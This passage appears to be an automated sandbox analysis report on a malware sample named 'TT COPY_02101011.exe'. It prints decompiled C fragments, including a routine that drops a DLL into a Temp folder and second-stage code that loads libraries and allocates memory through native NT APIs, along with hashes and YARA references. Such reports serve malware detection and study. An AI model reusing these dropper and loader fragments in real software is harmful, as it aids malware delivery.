Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp Download File

Similarity

API ID: _memcmp
String ID: (%p) %s %p %p$(%p) Unhandled Sink: %s
API String ID: 2931989736-219090540
Opcode ID: 3de1567bfd49f930e144c12078b021153c5538351b17d8b74515e471fdcd336c
Instruction ID: d19d2395c853d5f776270e7cc75a341a2d5bd54c68d9f578bd5695b489a62aac
Opcode Fuzzy Hash: 3de1567bfd49f930e144c12078b021153c5538351b17d8b74515e471fdcd336c
Instruction Fuzzy Hash: 861158F9D00108BBEB10DE94DD46FAE33A8DB44344F108128FD095B246E675EA94DB72

Uniqueness

Uniqueness Score: -1.00%

Function 00404C19, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404C19(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x429fc0 != _t22) {
							 *0x429fc0 = _t22;
							E0040592B(0x429fd8, 0x42f000);
							E00405889(0x42f000, _t22);
							E0040140B(6);
							E0040592B(0x42f000, 0x429fd8);
						}
						L11:
						return CallWindowProcA( *0x429fc8, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E00404598(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403D29(0x413);
				return 0;
			}

0x00404c25
0x00404c4a
0x00404c6a
0x00404c6d
0x00404c70
0x00404c87
0x00404c8d
0x00404c94
0x00404c9b
0x00404ca2
0x00404ca7
0x00404cad
0x00000000
0x00404cbd
0x00404c57
0x00404caa
0x00404caa
0x00000000
0x00404caa
0x00404c63
0x00404c65
0x00000000
0x00404c65
0x00404c2b
0x00000000
0x00000000
0x00404c32
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00404C4F
CallWindowProcA.USER32 ref: 00404CBD

Part of subcall function 00403D29: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403D3B

Strings

, xrefs: 00404C27

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: ea1295a8c6bde433973a6376a8295198ffc5156557007cb4ade3dbcb01cff8e9
Instruction ID: d407fede90f1340f75a9edbd02c1d8e6092547d547c096207559e891c258f88e
Opcode Fuzzy Hash: ea1295a8c6bde433973a6376a8295198ffc5156557007cb4ade3dbcb01cff8e9
Instruction Fuzzy Hash: C1119D71105608BFEF21AF52DD4099B3729EF84769F01803AFA05751E1C37D8C62CB69

Uniqueness

Uniqueness Score: -1.00%

Function 10002EE0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 10002F09
_memcmp.LIBCMT ref: 10002F25

Strings

unsupported interface: %s, xrefs: 10002F65

Memory Dump Source

Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp Download File

Similarity

API ID: _memcmp
String ID: unsupported interface: %s
API String ID: 2931989736-1937909893
Opcode ID: 0bbed91d44bfca9cc95a09e59af54bd13ed5d8668a07c598eebc12532b32b5fc
Instruction ID: 756ccb4e3c111b8c8e4908a39a05004d930757dff1ded9d2ad15e678158e6c47
Opcode Fuzzy Hash: 0bbed91d44bfca9cc95a09e59af54bd13ed5d8668a07c598eebc12532b32b5fc
Instruction Fuzzy Hash: 49112AB9900209AFEB00DF60DC45FAE77B5EB48380F108478F9199B385D671EA90CB55

Uniqueness

Uniqueness Score: -1.00%

Function 10002B80, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 10002BA9
_memcmp.LIBCMT ref: 10002BC5

Strings

unsupported interface: %s, xrefs: 10002C05

Memory Dump Source

Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp Download File

Similarity

API ID: _memcmp
String ID: unsupported interface: %s
API String ID: 2931989736-1937909893
Opcode ID: e506a027125c8b6d05b04aff437e9a7864523052f3fd6083d7d3a6c8970f50ca
Instruction ID: 05601d2df3204a6978084df65b63404ceb97135f502289257fd2f71aa67c2633
Opcode Fuzzy Hash: e506a027125c8b6d05b04aff437e9a7864523052f3fd6083d7d3a6c8970f50ca
Instruction Fuzzy Hash: 81112AB9D00208ABEB00DF64DC46FEE77A4EB49380F108468F9095B345E775EA94CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004024B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34
filestringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E004029E8(0x11));
				} else {
					E004029CB(1);
					 *0x409f78 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E004058A2(_t17 + 8, _t15), "C:\Users\jones\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

0x004024b0
0x004024b0
0x004024b3
0x004024ce
0x004024b5
0x004024b7
0x004024bc
0x004024c3
0x004024d5
0x0040264e
0x0040264e
0x004024db
0x004024ed
0x004015a6
0x004015a8
0x00000000
0x004015ae
0x004015a8
0x00402880
0x0040288c

APIs

lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll,00000000,?,?,00000000,00000011), ref: 004024ED

Strings

C:\Users\user\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll, xrefs: 004024BC, 004024E1

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWritelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll
API String ID: 427699356-2834972675
Opcode ID: 3ef39aa938cb109eefe55d27aafa72d95b37ec9a2dd30eed20e934897815d4b9
Instruction ID: 2b901ff19b85a4e76c04b2b8852d4c7aed572531c5b12b0aefee0adfe1f835b5
Opcode Fuzzy Hash: 3ef39aa938cb109eefe55d27aafa72d95b37ec9a2dd30eed20e934897815d4b9
Instruction Fuzzy Hash: 7EF0E9B2A54240BFDB00EBB19D49EAB76589B00344F20443BB142F50C2D6BC8D819B2D

Uniqueness

Uniqueness Score: -1.00%

Function 00405465, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405465(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x00405466
0x00405470
0x00405472
0x00405479
0x00405481
0x00000000
0x00000000
0x00000000
0x00405481
0x00405483
0x00405488

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C77,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\TT COPY_02101011.exe,C:\Users\user\Desktop\TT COPY_02101011.exe,80000000,00000003), ref: 0040546B
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C77,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\TT COPY_02101011.exe,C:\Users\user\Desktop\TT COPY_02101011.exe,80000000,00000003), ref: 00405479

Strings

C:\Users\user\Desktop, xrefs: 00405465

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction ID: d448c4330aaee4e1d52c8fc1992275a879f371812311106428750dc828cdcd14
Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction Fuzzy Hash: 6CD09EA241D9A06EE30256149C04B9F6A48DB16711F194462E580A6191C2785D818BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405577, Relevance: 5.0, APIs: 4, Instructions: 30
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405577(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}

0x00405583
0x00405585
0x004055ad
0x00405592
0x00405597
0x004055a2
0x00000000
0x004055bf
0x004055ab
0x004055ab
0x00000000

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040557E
lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405597
CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004055A5
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004055AE

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction ID: 67566e0cb393ef72fa6fa9f0f91681af9918d2384c5fdc364e409a19ee530f2a
Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction Fuzzy Hash: D2F0A73620AD51EBD2025B255C04E6B7A99EF91324B14057AF440F2144D3399C529BBB

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: TT COPY_02101011.exe PID: 6644 Parent PID: 6584 TT COPY_02101011.exeCOMMON

Executed Functions

Function 004186A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E004186A0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191F0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a41
				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4); // executed
				return _t18;
			}

0x004186a3
0x004186af
0x004186b7
0x004186bc
0x004186e5
0x004186e9

APIs

NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5

Strings

A:A, xrefs: 004186BC, 004186C8

Memory Dump Source

Source File: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: A:A
API String ID: 2738559852-2859176346
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: f080bec4c040545e3dab2a82d2c0628179b57ce59769f180118a0d9c745142a3
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 84F0A4B2200208ABDB14DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B50, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409B50(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AF80( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B3A0(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B620( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419730(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b6c
0x00409b6f
0x00409b74
0x00409b79
0x00409b83
0x00409b88
0x00409b8b
0x00409b8d
0x00409b95
0x00409b9a
0x00409b9a
0x00409ba1
0x00409ba9
0x00409bac
0x00409bae
0x00409bc2
0x00000000
0x00409bc4
0x00409bca
0x00409b7e
0x00409b7e
0x00409b7e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2

Memory Dump Source

Source File: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction ID: 5a8ad600e2bb26a3f9256955bcf7627a7477e6013f8e9ac5f1feb4612366a355
Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction Fuzzy Hash: 3A0152B5D0010DA7DB10DAA1DC42FDEB378AB54308F0041A9E918A7281F634EB54CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004185F0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004185F0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191F0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004185ff
0x00418607
0x0041863d
0x00418641

APIs

NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D

Memory Dump Source

Source File: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 6e88bdc2a8d45a62887e6f3ef0105f77e511591ccf53121fd16df0132ea8aa9a
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 17F0BDB2200208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004187D0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004187D0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191F0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x004187df
0x004187e7
0x00418809
0x0041880d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809

Memory Dump Source

Source File: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 706794cddc655a9f1cf9aa3041d650f47f408424a1237cb237646820d67af729
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: C6F015B2200208ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418720, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418720(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409773
				E004191F0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x00418723
0x00418726
0x0041872f
0x00418737
0x00418745
0x00418749

APIs

NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745

Memory Dump Source

Source File: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 78d7ac03eca040244b58aa8b13355d71f7060bfbe0c396a3df5df4df45d4e392
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: D4D01776200218BBE710EF99CC89EE77BACEF48760F154499BA189B242C530FA4086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00AD98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AD98FA

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e451cc9eebb955b4fedb46407bea9ad068d38aad6bf224e32d83016342a406d0
Instruction ID: 083493f1fc787a984f6fb0e72b5e296384773dd8cb60c366465a78c7396f7bba
Opcode Fuzzy Hash: e451cc9eebb955b4fedb46407bea9ad068d38aad6bf224e32d83016342a406d0
Instruction Fuzzy Hash: DA90026160104502D201716A4404626000A97D03C1FA1C032A5014555ECA658992F171

Uniqueness

Uniqueness Score: -1.00%

Function 00AD9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AD986A

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3991bc9189e1c52bfdce17286c4245004a23e7908dbaefe05f76792b7c5c637c
Instruction ID: b417ac06e3daa00e766030c072bf4db0582811d6f8f0fceff70dcfffb6f72931
Opcode Fuzzy Hash: 3991bc9189e1c52bfdce17286c4245004a23e7908dbaefe05f76792b7c5c637c
Instruction Fuzzy Hash: C490027120104413D211616A4504717000997D03C1FA1C422A4414558D96968952F161

Uniqueness

Uniqueness Score: -1.00%

Function 00AD9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AD984A

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2a44a689a9f21f91308f3045f6eeeb62794905e69a9640f030993e469c6c542c
Instruction ID: c422b1621c8530879f5a0adc1b40166e643833fa7dfe12c7cd2b0bd28f6a3f23
Opcode Fuzzy Hash: 2a44a689a9f21f91308f3045f6eeeb62794905e69a9640f030993e469c6c542c
Instruction Fuzzy Hash: 3B900261242081525645B16A44045174006A7E03C17A1C022A5404950C85669856E661

Uniqueness

Uniqueness Score: -1.00%

Function 00AD99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AD99AA

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 22a671f7f9e625e709b37c2649b4d0dff5d2963b4f39af695bde527ab6a00045
Instruction ID: b9952e3a66ae352b219d4b789e893a428db8d1ac0ff1e0d9f2ab8eb7e5de6315
Opcode Fuzzy Hash: 22a671f7f9e625e709b37c2649b4d0dff5d2963b4f39af695bde527ab6a00045
Instruction Fuzzy Hash: A09002A134104442D200616A4414B160005D7E1381F61C025E5054554D8659CC52B166

Uniqueness

Uniqueness Score: -1.00%

Function 00AD95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AD95DA

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6742ccbf2e76a34a2f54026eb4da335cac33bf790fc94e7e4e8801907ee2740a
Instruction ID: 8580965b5f34048d2b35b5f145ebb545c161dee1e22da1714d14980fc253a71e
Opcode Fuzzy Hash: 6742ccbf2e76a34a2f54026eb4da335cac33bf790fc94e7e4e8801907ee2740a
Instruction Fuzzy Hash: EA9002A1202040034205716A4414626400A97E0381B61C031E5004590DC5658891B165

Uniqueness

Uniqueness Score: -1.00%

Function 00AD9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AD991A

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8ddff5a78a2cc22b81013c7da17ee9f35c72ab0fd69e427acd8b18ce050e07ec
Instruction ID: f88f69e577dd8b5989aafa317b9eb9729724babef939b0e5cda768573c1f12d3
Opcode Fuzzy Hash: 8ddff5a78a2cc22b81013c7da17ee9f35c72ab0fd69e427acd8b18ce050e07ec
Instruction Fuzzy Hash: 239002B120104402D240716A4404756000597D0381F61C021A9054554E86998DD5B6A5

Uniqueness

Uniqueness Score: -1.00%

Function 00AD9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AD954A

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 15933bd02b5489df123c0109e45e42eaa67ccb17804bdb0326fddeab5ab6453c
Instruction ID: c483a732e72e643345e5c2517cbe4069e032a07bba4822f984174797a1fa0d20
Opcode Fuzzy Hash: 15933bd02b5489df123c0109e45e42eaa67ccb17804bdb0326fddeab5ab6453c
Instruction Fuzzy Hash: C1900265211040030205A56A0704517004697D53D1361C031F5005550CD6618861A161

Uniqueness

Uniqueness Score: -1.00%

Function 00AD96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AD96EA

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 446a56bdfeab484916a566414efa7e0253d918ee0bdf761cc14319441670cd9c
Instruction ID: 1fbca259a61b5c628cedd718d673250273c40fb7da732671623d085777a1c094
Opcode Fuzzy Hash: 446a56bdfeab484916a566414efa7e0253d918ee0bdf761cc14319441670cd9c
Instruction Fuzzy Hash: 6D9002712010C802D210616A840475A000597D0381F65C421A8414658D86D58891B161

Uniqueness

Uniqueness Score: -1.00%

Function 00AD9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AD9A2A

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a154e72207113ab9ff373fd21158da70194a75a1174dc6453b960dc6d5a700c5
Instruction ID: 5ed9b0b157f08aa9d90cadecf97e7f5070e1b2857e94ab7fb2d4a65c765db022
Opcode Fuzzy Hash: a154e72207113ab9ff373fd21158da70194a75a1174dc6453b960dc6d5a700c5
Instruction Fuzzy Hash: E1900261601040424240717A88449164005BBE1391761C131A4988550D85998865A6A5

Uniqueness

Uniqueness Score: -1.00%

Function 00AD9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AD9A0A

Memory Dump Source

